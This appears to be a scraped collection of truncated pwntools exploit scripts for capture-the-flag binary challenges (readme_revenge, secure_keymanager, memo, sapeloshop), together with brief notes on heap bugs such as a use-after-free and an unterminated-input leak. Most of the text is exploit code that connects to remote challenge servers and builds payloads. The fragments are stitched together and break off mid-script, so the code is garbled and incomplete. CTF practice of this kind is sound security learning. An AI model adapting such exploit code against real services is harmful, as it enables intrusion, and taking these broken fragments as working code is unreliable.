Challenge makes a thread to do the job. So , a thread_arena is created on a new mmap_segment.
Overflow in read function :
for ( i = 0LL; ; i += v3 )
{
#!/usr/bin/python | |
from pwn import * | |
p = remote("35.198.130.245", 1337) | |
#p = process("./readme_revenge") | |
raw_input() | |
#name = "A"*920 | |
name = p64(0x00) # Pass NULL Check. | |
name += "XXXX" |
#!/usr/bin/python | |
from pwn import * | |
p = remote("secure_keymanager.pwn.seccon.jp",47225) | |
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"}) | |
raw_input() | |
def menu(): | |
p.recvuntil(">>") |
#!/usr/bin/python | |
from pwn import * | |
elf = ELF("./libc-2.23.so") | |
p = remote("159.203.116.12", 8888) | |
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"}) | |
raw_input() | |
def menu(): | |
p.recvuntil(">") |
#!/usr/bin/python | |
from pwn import * | |
elf = ELF("./libc-2.23.so") | |
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80) | |
r = remote('sapeloshop.teaser.insomnihack.ch', 80) | |
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"}) | |
raw_input() | |
i = int("3d714", 16) |
#!/usr/bin/python | |
from pwn import * | |
rol1 = lambda val, r_bits, max_bits: \ | |
(val << r_bits%max_bits) & (2**max_bits-1) | \ | |
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits))) | |
ror1 = lambda val, r_bits, max_bits: \ | |
((val & (2**max_bits-1)) >> r_bits%max_bits) | \ | |
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) |
Challenge from RCTF, prequals to XCTF.
There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"
However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.